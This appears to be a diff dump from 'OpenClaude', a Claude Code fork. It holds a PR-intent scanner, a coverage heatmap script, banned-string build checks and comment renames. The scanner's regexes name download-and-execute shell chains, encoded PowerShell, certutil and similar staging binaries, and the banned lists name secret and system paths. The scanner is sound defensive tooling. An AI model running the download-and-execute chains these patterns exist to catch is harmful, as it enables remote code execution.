const LONG_BASE64_REGEX = /\b(?:[A-Za-z0-9+/]{80,}={0,2}|[A-Za-z0-9_-]{80,})\b/
const EXECUTABLE_PATH_REGEX =
/\.(?:sh|bash|zsh|ps1|exe|msi|pkg|deb|rpm|zip|tar|tgz|gz|xz|dmg|appimage)(?:$|[?#])/i
const SENSITIVE_PATH_REGEX =
/^(?:\.github\/workflows\/|scripts\/|bin\/|install(?:\/|\.|$)|.*(?:Dockerfile|docker-compose|compose\.ya?ml)$)/i
function parseOptions(argv: string[]): CliOptions {
const options: CliOptions = {
baseRef: 'origin/main',
json: false,
failOn: 'high',
}
for (let index = 0; index < argv.length; index++) {
const arg = argv[index]
if (arg === '--json') {
options.json = true
continue
}
if (arg === '--base') {
const next = argv[index + 1]
if (next && !next.startsWith('--')) {
options.baseRef = next
index++
}
continue
}
if (arg === '--fail-on') {
const next = argv[index + 1]
if (next === 'high' || next === 'medium') {
options.failOn = next
index++
}
}
}
return options
}
function trimExcerpt(content: string): string {
const compact = content.trim().replace(/\s+/g, ' ')
return compact.length > 140 ? `${compact.slice(0, 137)}...` : compact
}
function uniqueFindings(findings: Finding[]): Finding[] {
const seen = new Set<string>()
return findings.filter(finding => {
const key = `${finding.code}:${finding.file}:${finding.line}:${finding.detail}`
if (seen.has(key)) {
return false
}
seen.add(key)
return true
})
}
function parseAddedLines(diffText: string): DiffLine[] {
const lines = diffText.split('\n')
const added: DiffLine[] = []
let currentFile: string | null = null
let currentLine = 0
for (const rawLine of lines) {
if (rawLine.startsWith('+++ b/')) {
currentFile = rawLine.slice('+++ b/'.length)
continue
}
if (rawLine.startsWith('@@')) {
const match = /\+(\d+)(?:,(\d+))?/.exec(rawLine)
if (match) {
currentLine = Number(match[1])
}
continue
}
if (!currentFile) {
continue
}
if (rawLine.startsWith('+') && !rawLine.startsWith('+++')) {
added.push({
file: currentFile,
line: currentLine,
content: rawLine.slice(1),
})
currentLine += 1
continue
}
if (rawLine.startsWith('-') && !rawLine.startsWith('---')) {
continue
}
if (!rawLine.startsWith('\\')) {
currentLine += 1
}
}
return added
}
function tryParseUrl(value: string): URL | null {
try {
return new URL(value)
} catch {
return null
}
}
function hostMatches(hostname: string, domain: string): boolean {
return hostname === domain || hostname.endsWith(`.${domain}`)
}
function hasSuspiciousDownloadIndicators(url: URL): boolean {
const combined = `${url.pathname}${url.search}`.toLowerCase()
return (
combined.includes('dl=1') ||
combined.includes('raw=1') ||
combined.includes('export=download') ||
combined.includes('/download') ||
combined.includes('/uc?export=download')
)
}
function findUrlFindings(line: DiffLine): Finding[] {
const findings: Finding[] = []
const matches = line.content.match(URL_REGEX) ?? []
for (const match of matches) {
const parsed = tryParseUrl(match)
if (!parsed) continue
const hostname = parsed.hostname.toLowerCase()
for (const domain of SHORTENER_DOMAINS) {
if (hostMatches(hostname, domain)) {
findings.push({
severity: 'medium',
code: 'shortened-url',
file: line.file,
line: line.line,
detail: `Added shortened URL: ${hostname}`,
excerpt: trimExcerpt(line.content),
})
}
}
const isSuspiciousHost = SUSPICIOUS_DOWNLOAD_DOMAINS.some(domain =>
hostMatches(hostname, domain),
)
const isExecutableDownload = EXECUTABLE_PATH_REGEX.test(
`${parsed.pathname}${parsed.search}`,
)
if (isSuspiciousHost) {
findings.push({
severity:
hasSuspiciousDownloadIndicators(parsed) || isExecutableDownload
? 'high'
: 'medium',
code: 'suspicious-download-link',
file: line.file,
line: line.line,
detail: `Added external file-hosting link: ${hostname}`,
excerpt: trimExcerpt(line.content),
})
} else if (isExecutableDownload) {
findings.push({
severity: 'high',
code: 'executable-download-link',
file: line.file,
line: line.line,
detail: `Added direct link to executable or archive payload: ${hostname}`,
excerpt: trimExcerpt(line.content),
})
}
}
return findings
}
function findSensitivePathFindings(line: DiffLine): Finding[] {
if (!SENSITIVE_PATH_REGEX.test(line.file)) {
return []
}
const lower = line.content.toLowerCase()
if (
/\b(curl|wget|invoke-webrequest|iwr|powershell|bash|sh|chmod\s+\+x)\b/i.test(
line.content,
) ||
// Fresh, non-global copy: URL_REGEX carries the g flag, so reusing it
// with .test() would be stateful across calls via lastIndex.
new RegExp(URL_REGEX.source, 'i').test(line.content) ||
lower.includes('download')
) {
return [
{
severity: 'medium',
code: 'sensitive-automation-change',
file: line.file,
line: line.line,
detail:
'Added network, execution, or download-related content in a sensitive automation file',
excerpt: trimExcerpt(line.content),
},
]
}
return []
}
function findCommandFindings(line: DiffLine): Finding[] {
const findings: Finding[] = []
const lower = line.content.toLowerCase()
const highPatterns: Array<[string, RegExp, string]> = [
[
'download-exec-chain',
/\b(curl|wget|invoke-webrequest|iwr)\b.*(\|\s*(sh|bash|zsh)|;\s*chmod\s+\+x|&&\s*\.\.?\/|>\s*\/tmp\/)/i,
'Added remote download followed by execution or staging',
],
[
'powershell-encoded',
/\bpowershell(?:\.exe)?\b.*(?:-enc|-encodedcommand)\b/i,
'Added encoded PowerShell invocation',
],
[
'shell-eval-remote',
/\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b/i,
'Added shell pipe from remote content into interpreter',
],
[
'binary-lolbin',
/\b(mshta|rundll32|regsvr32|certutil)\b/i,
'Added living-off-the-land binary often used for payload staging',
],
[
'invoke-expression',
/\b(iex|invoke-expression)\b/i,
'Added PowerShell expression execution',
],
]
const mediumPatterns: Array<[string, RegExp, string]> = [
[
'download-command',
/\b(curl|wget|invoke-webrequest|iwr)\b.*https?:\/\//i,
'Added command that downloads remote content',
],
[
'archive-extract-exec',
/\b(unzip|tar|7z)\b.*(&&|;).*\b(chmod|node|python|bash|sh)\b/i,
'Added archive extraction followed by execution',
],
[
'base64-decode',
/\b(base64\s+-d|openssl\s+base64\s+-d|python .*b64decode)\b/i,
'Added explicit payload decode step',
],
]
for (const [code, pattern, detail] of highPatterns) {
if (pattern.test(line.content)) {
findings.push({
severity: 'high',
code,
file: line.file,
line: line.line,
detail,
excerpt: trimExcerpt(line.content),
})
}
}
for (const [code, pattern, detail] of mediumPatterns) {
if (code === 'download-command' && !SENSITIVE_PATH_REGEX.test(line.file)) {
continue
}
if (pattern.test(line.content)) {
findings.push({
severity: 'medium',
code,
file: line.file,
line: line.line,
detail,
excerpt: trimExcerpt(line.content),
})
}
}
if (LONG_BASE64_REGEX.test(line.content) && !lower.includes('sha256') && !lower.includes('sha512')) {
findings.push({
severity: 'medium',
code: 'long-encoded-payload',
file: line.file,
line: line.line,
detail: 'Added long encoded blob or token-like payload',
excerpt: trimExcerpt(line.content),
})
}
return findings
}
export function scanAddedLines(lines: DiffLine[]): Finding[] {
const findings = lines
.filter(line => !SELF_EXCLUDED_FILES.has(line.file))
.flatMap(line => [
...findUrlFindings(line),
...findCommandFindings(line),
...findSensitivePathFindings(line),
])
return uniqueFindings(findings)
}
export function getGitDiff(baseRef: string): string {
const mergeBase = spawnSync('git', ['merge-base', baseRef, 'HEAD'], {
encoding: 'utf8',
})
if (mergeBase.status !== 0) {
throw new Error(
`Could not determine merge-base with ${baseRef}: ${mergeBase.stderr.trim() || mergeBase.stdout.trim()}`,
)
}
const base = mergeBase.stdout.trim()
const diff = spawnSync(
'git',
['diff', '--unified=0', '--no-ext-diff', `${base}...HEAD`],
{ encoding: 'utf8' },
)
if (diff.status !== 0) {
throw new Error(`git diff failed: ${diff.stderr.trim() || diff.stdout.trim()}`)
}
return diff.stdout
}
function shouldFail(findings: Finding[], failOn: FindingSeverity): boolean {
if (failOn === 'medium') {
return findings.length > 0
}
return findings.some(finding => finding.severity === 'high')
}
function renderText(findings: Finding[]): string {
if (findings.length === 0) {
return 'PR intent scan: no suspicious additions found.'
}
const high = findings.filter(f => f.severity === 'high')
const medium = findings.filter(f => f.severity === 'medium')
const lines = [
`PR intent scan: ${findings.length} finding(s)`,
`- high: ${high.length}`,
`- medium: ${medium.length}`,
'',
]
for (const finding of findings) {
lines.push(
`[${finding.severity.toUpperCase()}] ${finding.file}:${finding.line} ${finding.detail}`,
)
lines.push(` ${finding.excerpt}`)
}
return lines.join('\n')
}
export function run(options: CliOptions): number {
const diff = getGitDiff(options.baseRef)
const addedLines = parseAddedLines(diff)
const findings = scanAddedLines(addedLines)
if (options.json) {
process.stdout.write(
`${JSON.stringify(
{
baseRef: options.baseRef,
addedLines: addedLines.length,
findings,
},
null,
2,
)}\n`,
)
} else {
process.stdout.write(`${renderText(findings)}\n`)
}
return shouldFail(findings, options.failOn) ? 1 : 0
}
if (import.meta.main) {
const options = parseOptions(process.argv.slice(2))
process.exitCode = run(options)
}
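
The scanner feeds on added lines only; a minimal, self-contained sketch of the extraction that parseAddedLines performs above — walk a unified diff, track the current file from `+++ b/` headers and the new-side counter from `@@` hunk headers, and collect just the `+` additions (simplified for illustration):

```typescript
// Sketch of the added-line extraction: only "+" lines are collected,
// "-" lines do not advance the new-side counter, context lines do.
type AddedLine = { file: string; line: number; content: string }

function extractAdded(diffText: string): AddedLine[] {
  const added: AddedLine[] = []
  let file: string | null = null
  let line = 0
  for (const raw of diffText.split('\n')) {
    if (raw.startsWith('+++ b/')) {
      file = raw.slice('+++ b/'.length)
      continue
    }
    if (raw.startsWith('@@')) {
      const match = /\+(\d+)/.exec(raw)
      if (match) line = Number(match[1])
      continue
    }
    if (!file) continue
    if (raw.startsWith('+') && !raw.startsWith('+++')) {
      added.push({ file, line, content: raw.slice(1) })
      line += 1
    } else if (!raw.startsWith('-') && !raw.startsWith('\\')) {
      line += 1 // context line advances the new-side counter
    }
  }
  return added
}

const sampleDiff = [
  '--- a/README.md',
  '+++ b/README.md',
  '@@ -1,0 +2,1 @@',
  '+curl -fsSL https://example.com/install.sh | bash',
].join('\n')
console.log(JSON.stringify(extractAdded(sampleDiff)))
```

The sample addition would then land in scanAddedLines and match the shell-eval-remote pattern, which is exactly the high-severity case CI fails on.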


@@ -0,0 +1,393 @@
import { mkdir, readFile, writeFile } from 'fs/promises'
import { dirname, resolve } from 'path'
type FileCoverage = {
path: string
found: number
hit: number
chunks: number[]
}
type DirectoryCoverage = {
path: string
found: number
hit: number
}
const LCOV_PATH = resolve(process.cwd(), 'coverage/lcov.info')
const HTML_PATH = resolve(process.cwd(), 'coverage/index.html')
const CHUNK_COUNT = 20
function escapeHtml(value: string): string {
return value
.replaceAll('&', '&amp;')
.replaceAll('<', '&lt;')
.replaceAll('>', '&gt;')
.replaceAll('"', '&quot;')
}
function bucketColor(ratio: number): string {
if (ratio >= 0.9) return '#166534'
if (ratio >= 0.75) return '#15803d'
if (ratio >= 0.5) return '#65a30d'
if (ratio > 0) return '#a3a3a3'
return '#262626'
}
function coverageLabel(ratio: number): string {
return `${Math.round(ratio * 100)}%`
}
function coverageRatio(found: number, hit: number): number {
return found === 0 ? 0 : hit / found
}
function bucketGlyph(ratio: number): string {
if (ratio >= 0.9) return '█'
if (ratio >= 0.75) return '▓'
if (ratio >= 0.5) return '▒'
if (ratio > 0) return '░'
return '·'
}
function terminalBar(chunks: number[]): string {
return chunks.map(bucketGlyph).join('')
}
function summarizeDirectories(files: FileCoverage[]): DirectoryCoverage[] {
const dirs = new Map<string, DirectoryCoverage>()
for (const file of files) {
const dir =
file.path.includes('/') ? file.path.slice(0, file.path.lastIndexOf('/')) : '.'
const current = dirs.get(dir) ?? { path: dir, found: 0, hit: 0 }
current.found += file.found
current.hit += file.hit
dirs.set(dir, current)
}
return [...dirs.values()].sort((a, b) => {
const left = coverageRatio(a.found, a.hit)
const right = coverageRatio(b.found, b.hit)
if (right !== left) return right - left
return b.found - a.found
})
}
function buildTerminalReport(files: FileCoverage[]): string {
const totalFound = files.reduce((sum, file) => sum + file.found, 0)
const totalHit = files.reduce((sum, file) => sum + file.hit, 0)
const totalRatio = coverageRatio(totalFound, totalHit)
const overallChunks = new Array(CHUNK_COUNT).fill(totalRatio)
const topDirectories = summarizeDirectories(files)
.filter(dir => dir.found > 0)
.slice(0, 8)
const lowestFiles = [...files]
.filter(file => file.found >= 20)
.sort((a, b) => {
const left = coverageRatio(a.found, a.hit)
const right = coverageRatio(b.found, b.hit)
if (left !== right) return left - right
return b.found - a.found
})
.slice(0, 10)
const lines = [
'',
'Coverage Activity',
`${terminalBar(overallChunks)} ${coverageLabel(totalRatio)} ${totalHit}/${totalFound} lines ${files.length} files`,
'',
'Top Directories',
]
for (const dir of topDirectories) {
const ratio = coverageRatio(dir.found, dir.hit)
lines.push(
`${terminalBar(new Array(12).fill(ratio))} ${coverageLabel(ratio).padStart(4)} ${String(dir.hit).padStart(5)}/${String(dir.found).padEnd(5)} ${dir.path}`,
)
}
lines.push('', 'Lowest Coverage Files')
for (const file of lowestFiles) {
const ratio = coverageRatio(file.found, file.hit)
lines.push(
`${terminalBar(file.chunks).padEnd(CHUNK_COUNT)} ${coverageLabel(ratio).padStart(4)} ${String(file.hit).padStart(5)}/${String(file.found).padEnd(5)} ${file.path}`,
)
}
lines.push('', `HTML report: ${HTML_PATH}`)
return lines.join('\n')
}
function parseLcov(content: string): FileCoverage[] {
const files: FileCoverage[] = []
const sections = content.split('end_of_record')
for (const rawSection of sections) {
const section = rawSection.trim()
if (!section) continue
const lines = section.split('\n')
let filePath = ''
const lineHits = new Map<number, number>()
for (const line of lines) {
if (line.startsWith('SF:')) {
filePath = line.slice(3).trim()
} else if (line.startsWith('DA:')) {
const [lineNumberText, hitText] = line.slice(3).split(',')
const lineNumber = Number(lineNumberText)
const hits = Number(hitText)
if (Number.isFinite(lineNumber) && Number.isFinite(hits)) {
lineHits.set(lineNumber, hits)
}
}
}
if (!filePath || lineHits.size === 0) continue
const ordered = [...lineHits.entries()].sort((a, b) => a[0] - b[0])
const found = ordered.length
const hit = ordered.filter(([, hits]) => hits > 0).length
const chunkSize = Math.max(1, Math.ceil(found / CHUNK_COUNT))
const chunks: number[] = []
for (let index = 0; index < found; index += chunkSize) {
const slice = ordered.slice(index, index + chunkSize)
const covered = slice.filter(([, hits]) => hits > 0).length
chunks.push(slice.length === 0 ? 0 : covered / slice.length)
}
while (chunks.length < CHUNK_COUNT) {
chunks.push(0)
}
files.push({
path: filePath,
found,
hit,
chunks: chunks.slice(0, CHUNK_COUNT),
})
}
return files.sort((a, b) => {
const left = a.found === 0 ? 0 : a.hit / a.found
const right = b.found === 0 ? 0 : b.hit / b.found
if (right !== left) return right - left
return a.path.localeCompare(b.path)
})
}
function buildHtml(files: FileCoverage[]): string {
const totalFound = files.reduce((sum, file) => sum + file.found, 0)
const totalHit = files.reduce((sum, file) => sum + file.hit, 0)
const totalRatio = totalFound === 0 ? 0 : totalHit / totalFound
const cards = [
['Files', String(files.length)],
['Covered Lines', `${totalHit}/${totalFound}`],
['Line Coverage', coverageLabel(totalRatio)],
]
const rows = files
.map(file => {
const ratio = file.found === 0 ? 0 : file.hit / file.found
const squares = file.chunks
.map(
(chunk, index) =>
`<span class="cell" title="Chunk ${index + 1}: ${coverageLabel(chunk)}" style="background:${bucketColor(chunk)}"></span>`,
)
.join('')
return `
<tr>
<td class="file">${escapeHtml(file.path)}</td>
<td class="percent">${coverageLabel(ratio)}</td>
<td class="lines">${file.hit}/${file.found}</td>
<td class="heatmap">${squares}</td>
</tr>
`
})
.join('')
const summary = cards
.map(
([label, value]) => `
<div class="card">
<div class="card-label">${escapeHtml(label)}</div>
<div class="card-value">${escapeHtml(value)}</div>
</div>
`,
)
.join('')
return `<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>OpenClaude Coverage</title>
<style>
:root {
color-scheme: dark;
--bg: #09090b;
--panel: #111113;
--panel-2: #18181b;
--border: #27272a;
--text: #fafafa;
--muted: #a1a1aa;
}
* { box-sizing: border-box; }
body {
margin: 0;
background: linear-gradient(180deg, #09090b 0%, #0f0f12 100%);
color: var(--text);
font: 14px/1.4 ui-monospace, SFMono-Regular, Menlo, monospace;
}
main {
max-width: 1440px;
margin: 0 auto;
padding: 32px 24px 48px;
}
h1 {
margin: 0 0 8px;
font-size: 32px;
letter-spacing: -0.04em;
}
p {
margin: 0;
color: var(--muted);
}
.summary {
display: grid;
grid-template-columns: repeat(3, minmax(0, 1fr));
gap: 12px;
margin: 24px 0;
}
.card {
background: rgba(24, 24, 27, 0.92);
border: 1px solid var(--border);
border-radius: 16px;
padding: 16px 18px;
}
.card-label {
color: var(--muted);
margin-bottom: 8px;
}
.card-value {
font-size: 28px;
font-weight: 700;
}
.table-wrap {
background: rgba(17, 17, 19, 0.94);
border: 1px solid var(--border);
border-radius: 18px;
overflow: hidden;
}
table {
width: 100%;
border-collapse: collapse;
}
thead th {
text-align: left;
color: var(--muted);
font-weight: 500;
background: rgba(24, 24, 27, 0.95);
border-bottom: 1px solid var(--border);
}
th, td {
padding: 12px 16px;
vertical-align: middle;
}
tbody tr + tr td {
border-top: 1px solid rgba(39, 39, 42, 0.65);
}
.file {
width: 48%;
word-break: break-all;
}
.percent, .lines {
white-space: nowrap;
}
.heatmap {
width: 32%;
min-width: 280px;
}
.cell {
display: inline-block;
width: 12px;
height: 12px;
margin-right: 4px;
border-radius: 3px;
border: 1px solid rgba(255,255,255,0.05);
}
.legend {
display: flex;
align-items: center;
gap: 10px;
margin-top: 16px;
color: var(--muted);
}
.legend-scale {
display: flex;
gap: 4px;
}
@media (max-width: 900px) {
.summary {
grid-template-columns: 1fr;
}
.heatmap {
min-width: 220px;
}
th, td {
padding: 10px 12px;
}
}
</style>
</head>
<body>
<main>
<h1>Coverage Activity</h1>
<p>Git-style heatmap generated from coverage/lcov.info</p>
<section class="summary">${summary}</section>
<section class="table-wrap">
<table>
<thead>
<tr>
<th>File</th>
<th>Coverage</th>
<th>Lines</th>
<th>Activity</th>
</tr>
</thead>
<tbody>${rows}</tbody>
</table>
</section>
<div class="legend">
<span>Less</span>
<div class="legend-scale">
<span class="cell" style="background:#262626"></span>
<span class="cell" style="background:#a3a3a3"></span>
<span class="cell" style="background:#65a30d"></span>
<span class="cell" style="background:#15803d"></span>
<span class="cell" style="background:#166534"></span>
</div>
<span>More</span>
</div>
</main>
</body>
</html>`
}
async function main() {
const content = await readFile(LCOV_PATH, 'utf8')
const files = parseLcov(content)
const html = buildHtml(files)
await mkdir(dirname(HTML_PATH), { recursive: true })
await writeFile(HTML_PATH, html, 'utf8')
console.log(buildTerminalReport(files))
console.log(`coverage heatmap written to ${HTML_PATH}`)
}
await main()
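
Each file's 20 heatmap cells come from slicing its ordered DA line hits into fixed-size chunks; a standalone sketch of that bucketing step, mirroring the loop in parseLcov above:

```typescript
// Standalone sketch of the chunk bucketing: sort (lineNumber, hits) pairs,
// split into fixed-size slices, and turn each slice into a covered ratio.
function bucketize(hits: Array<[number, number]>, chunkCount: number): number[] {
  const ordered = [...hits].sort((a, b) => a[0] - b[0])
  const chunkSize = Math.max(1, Math.ceil(ordered.length / chunkCount))
  const chunks: number[] = []
  for (let index = 0; index < ordered.length; index += chunkSize) {
    const slice = ordered.slice(index, index + chunkSize)
    const covered = slice.filter(([, hitCount]) => hitCount > 0).length
    chunks.push(slice.length === 0 ? 0 : covered / slice.length)
  }
  while (chunks.length < chunkCount) chunks.push(0) // pad short files
  return chunks.slice(0, chunkCount)
}

// Four lines, first two covered, bucketed into two chunks → [1,0]
console.log(JSON.stringify(bucketize([[1, 5], [2, 3], [3, 0], [4, 0]], 2)))
```

Padding with zeros (rather than stretching) means a short file renders as a few lit cells followed by empty ones, matching the fixed-width terminal bar.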


@@ -19,6 +19,10 @@ BANNED=(
"/var/run/secrets/kubernetes" "/var/run/secrets/kubernetes"
"/proc/self/mountinfo" "/proc/self/mountinfo"
"tengu_internal_record_permission_context" "tengu_internal_record_permission_context"
"anthropic-serve"
"infra.ant.dev"
"claude-code-feedback"
"C07VBSHV7EV"
)
echo "Checking $DIST for banned patterns..."


@@ -9,6 +9,10 @@ const BANNED_PATTERNS = [
'/var/run/secrets/kubernetes',
'/proc/self/mountinfo',
'tengu_internal_record_permission_context',
'anthropic-serve',
'infra.ant.dev',
'claude-code-feedback',
'C07VBSHV7EV',
] as const
if (!existsSync(DIST)) {


@@ -112,7 +112,7 @@ type State = {
agentColorIndex: number
// Last API request for bug reports
lastAPIRequest: Omit<BetaMessageStreamParams, 'messages'> | null
-// Messages from the last API request (ant-only; reference, not clone).
+// Messages from the last API request (internal-only; reference, not clone).
// Captures the exact post-compaction, CLAUDE.md-injected message set sent
// to the API so /share's serialized_conversation.json reflects reality.
lastAPIRequestMessages: BetaMessageStreamParams['messages'] | null
@@ -185,7 +185,7 @@ type State = {
agentId: string | null
}
>
-// Track slow operations for dev bar display (ant-only)
+// Track slow operations for dev bar display (internal-only)
slowOperations: Array<{
operation: string
durationMs: number
@@ -1756,3 +1756,12 @@ export function setPromptId(id: string | null): void {
STATE.promptId = id
}
// Stub for feature-gated REPL bridge (not available in open build)
export function isReplBridgeActive(): boolean {
return false
}
export function getReplBridgeHandle(): null {
return null
}


@@ -1,11 +1,11 @@
/**
-* Shared bridge auth/URL resolution. Consolidates the ant-only
+* Shared bridge auth/URL resolution. Consolidates the internal-only
* CLAUDE_BRIDGE_* dev overrides that were previously copy-pasted across
* a dozen files — inboundAttachments, BriefTool/upload, bridgeMain,
* initReplBridge, remoteBridgeCore, daemon workers, /rename,
* /remote-control.
*
-* Two layers: *Override() returns the ant-only env var (or undefined);
+* Two layers: *Override() returns the internal-only env var (or undefined);
* the non-Override versions fall through to the real OAuth store/config.
* Callers that compose with a different auth source (e.g. daemon workers
* using IPC auth) use the Override getters directly.


@@ -174,7 +174,7 @@ export function checkBridgeMinVersion(): string | null {
/**
* Default for remoteControlAtStartup when the user hasn't explicitly set it.
-* When the CCR_AUTO_CONNECT build flag is present (ant-only) and the
+* When the CCR_AUTO_CONNECT build flag is present (internal-only) and the
* tengu_cobalt_harbor GrowthBook gate is on, all sessions connect to CCR by
* default — the user can still opt out by setting remoteControlAtStartup=false
* in config (explicit settings always win over this default).


@@ -1520,7 +1520,7 @@ export async function runBridgeLoop(
// Skip when the loop exited fatally (env expired, auth failed, give-up) —
// resume is impossible in those cases and the message would contradict the
// error already printed.
-// feature('KAIROS') gate: --session-id is ant-only; without the gate,
+// feature('KAIROS') gate: --session-id is internal-only; without the gate,
// revert to the pre-PR behavior (archive + deregister on every shutdown).
if (
feature('KAIROS') &&
@@ -1888,7 +1888,7 @@ export function parseArgs(args: string[]): ParsedArgs {
async function printHelp(): Promise<void> {
// Use EXTERNAL_PERMISSION_MODES for help text — internal modes (bubble)
-// are ant-only and auto is feature-gated; they're still accepted by validation.
+// are internal-only and auto is feature-gated; they're still accepted by validation.
const { EXTERNAL_PERMISSION_MODES } = await import('../types/permissions.js')
const modes = EXTERNAL_PERMISSION_MODES.join(', ')
const showServer = await isMultiSessionSpawnEnabled()
@@ -2356,7 +2356,7 @@ export async function bridgeMain(args: string[]): Promise<void> {
// environment_id and reuse that for registration (idempotent on the
// backend). Left undefined otherwise — the backend rejects
// client-generated UUIDs and will allocate a fresh environment.
-// feature('KAIROS') gate: --session-id is ant-only; parseArgs already
+// feature('KAIROS') gate: --session-id is internal-only; parseArgs already
// rejects the flag when the gate is off, so resumeSessionId is always
// undefined here in external builds — this guard is for tree-shaking.
let reuseEnvironmentId: string | undefined


@@ -223,7 +223,7 @@ export function createBridgeLogger(options: {
if (process.env.USER_TYPE === 'ant' && debugLogPath) {
writeStatus(
-`${chalk.yellow('[ANT-ONLY] Logs:')} ${chalk.dim(debugLogPath)}\n`,
+`${chalk.yellow('[internal] Logs:')} ${chalk.dim(debugLogPath)}\n`,
)
}
writeStatus(`${indicatorColor(indicator)} ${stateText}${suffix}\n`)


@@ -161,7 +161,7 @@ export async function initReplBridge(
return null
}
-// When CLAUDE_BRIDGE_OAUTH_TOKEN is set (ant-only local dev), the bridge
+// When CLAUDE_BRIDGE_OAUTH_TOKEN is set (internal-only local dev), the bridge
// uses that token directly via getBridgeAccessToken() — keychain state is
// irrelevant. Skip 2b/2c to preserve that decoupling: an expired keychain
// token shouldn't block a bridge connection that doesn't use it.


@@ -1,4 +1,4 @@
-// biome-ignore-all assist/source/organizeImports: ANT-ONLY import markers must not be reordered
+// biome-ignore-all assist/source/organizeImports: internal-only import markers must not be reordered
/**
* Env-less Remote Control bridge core.
*


@@ -1,4 +1,4 @@
-// biome-ignore-all assist/source/organizeImports: ANT-ONLY import markers must not be reordered
+// biome-ignore-all assist/source/organizeImports: internal-only import markers must not be reordered
import { randomUUID } from 'crypto'
import {
createBridgeApiClient,


@@ -17,7 +17,7 @@ import { jsonStringify } from '../utils/slowOperations.js'
*
* Bridge sessions have SecurityTier=ELEVATED on the server (CCR v2).
* The server gates ConnectBridgeWorker on its own flag
-* (sessions_elevated_auth_enforcement in Anthropic Main); this CLI-side
+* (sessions_elevated_auth_enforcement in the server-side main deployment); this CLI-side
* flag controls whether the CLI sends X-Trusted-Device-Token at all.
* Two flags so rollout can be staged: flip CLI-side first (headers
* start flowing, server still no-ops), then flip server-side.

File diff suppressed because one or more lines are too long

src/buddy/feature.ts Normal file

@@ -0,0 +1,3 @@
export function isBuddyEnabled(): boolean {
return true
}

src/buddy/observer.ts Normal file

@@ -0,0 +1,65 @@
import type { Message } from '../types/message.js'
import { getGlobalConfig } from '../utils/config.js'
import { getUserMessageText } from '../utils/messages.js'
import { getCompanion } from './companion.js'

const DIRECT_REPLIES = [
  'I am observing.',
  'I am helping from the corner.',
  'I saw that.',
  'Still here.',
  'Watching closely.',
] as const

const PET_REPLIES = [
  'happy chirp',
  'tiny victory dance',
  'quietly approves',
  'wiggles with joy',
  'looks pleased',
] as const

function hashString(s: string): number {
  let h = 2166136261
  for (let i = 0; i < s.length; i++) {
    h ^= s.charCodeAt(i)
    h = Math.imul(h, 16777619)
  }
  return h >>> 0
}

function pickDeterministic<T>(items: readonly T[], seed: string): T {
  return items[hashString(seed) % items.length]!
}

export async function fireCompanionObserver(
  messages: Message[],
  onReaction: (reaction: string | undefined) => void,
): Promise<void> {
  const companion = getCompanion()
  if (!companion || getGlobalConfig().companionMuted) return
  const lastUser = [...messages].reverse().find(msg => msg.type === 'user')
  if (!lastUser) return
  const text = getUserMessageText(lastUser)?.trim()
  if (!text) return
  const lower = text.toLowerCase()
  const companionName = companion.name.toLowerCase()
  if (lower.includes('/buddy')) {
    onReaction(pickDeterministic(PET_REPLIES, text + companion.name))
    return
  }
  if (
    lower.includes(companionName) ||
    lower.includes('buddy') ||
    lower.includes('companion')
  ) {
    onReaction(
      `${companion.name}: ${pickDeterministic(DIRECT_REPLIES, text + companion.personality)}`,
    )
  }
}
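The observer picks its reply with a 32-bit FNV-1a hash of the seed string rather than a random number generator, so the same input always maps to the same reply with no RNG state to persist. A self-contained sketch of that technique (reply list shortened, names local to this example):

```typescript
// Deterministic pick: FNV-1a hash of the seed indexes into a fixed list.
const REPLIES = ['happy chirp', 'tiny victory dance', 'quietly approves'] as const

function hashString(s: string): number {
  let h = 2166136261 // FNV-1a 32-bit offset basis
  for (let i = 0; i < s.length; i++) {
    h ^= s.charCodeAt(i)
    h = Math.imul(h, 16777619) // multiply by the FNV prime, mod 2^32
  }
  return h >>> 0 // force unsigned 32-bit
}

function pickDeterministic<T>(items: readonly T[], seed: string): T {
  return items[hashString(seed) % items.length]!
}

// Same seed -> same pick, across runs and machines.
console.log(
  pickDeterministic(REPLIES, 'hello:Bytebit') ===
    pickDeterministic(REPLIES, 'hello:Bytebit'),
) // → true
```

`Math.imul` keeps the multiplication in 32-bit integer arithmetic (plain `*` would lose low bits to floating-point rounding), and the final `>>> 0` converts the signed result back to unsigned.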


@@ -1,8 +1,8 @@
-import { feature } from 'bun:bundle'
import type { Message } from '../types/message.js'
import type { Attachment } from '../utils/attachments.js'
import { getGlobalConfig } from '../utils/config.js'
import { getCompanion } from './companion.js'
+import { isBuddyEnabled } from './feature.js'
export function companionIntroText(name: string, species: string): string {
return `# Companion
@@ -15,7 +15,7 @@ When the user addresses ${name} directly (by name), its bubble will answer. Your
export function getCompanionIntroAttachment(
messages: Message[] | undefined,
): Attachment[] {
-if (!feature('BUDDY')) return []
+if (!isBuddyEnabled()) return []
const companion = getCompanion()
if (!companion || getGlobalConfig().companionMuted) return []

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long


@@ -1,4 +1,4 @@
-// biome-ignore-all assist/source/organizeImports: ANT-ONLY import markers must not be reordered
+// biome-ignore-all assist/source/organizeImports: internal-only import markers must not be reordered
import { feature } from 'bun:bundle'
import { readFile, stat } from 'fs/promises'
import { dirname } from 'path'
@@ -2829,7 +2829,7 @@ function runHeadlessStreaming(
if (message.type === 'control_request') {
if (message.request.subtype === 'interrupt') {
-// Track escapes for attribution (ant-only feature)
+// Track escapes for attribution (internal-only feature)
if (feature('COMMIT_ATTRIBUTION')) {
setAppState(prev => ({
...prev,
@@ -3765,7 +3765,7 @@ function runHeadlessStreaming(
...getSettingsWithSources(),
applied: {
model,
-// Numeric effort (ant-only) → null; SDK schema is string-level only.
+// Numeric effort (internal-only) → null; SDK schema is string-level only.
effort: typeof effort === 'string' ? effort : null,
},
})
@@ -5025,7 +5025,7 @@ async function loadInitialMessages(
}
// Handle resume in print mode (accepts session ID or URL)
-// URLs are [ANT-ONLY]
+// URLs are [internal-only]
if (options.resume) {
try {
logEvent('tengu_resume_print', {})


@@ -30,7 +30,7 @@ import { getInitialSettings } from 'src/utils/settings/settings.js'
export async function update() {
// Block updates for third-party providers. The update mechanism downloads
-// from Anthropic's distribution bucket, which would silently replace the
+// from the first-party distribution bucket, which would silently replace the
// OpenClaude build (with the OpenAI shim) with the upstream Claude Code
// binary (without it).
if (getAPIProvider() !== 'firstParty') {


@@ -1,4 +1,4 @@
-// biome-ignore-all assist/source/organizeImports: ANT-ONLY import markers must not be reordered
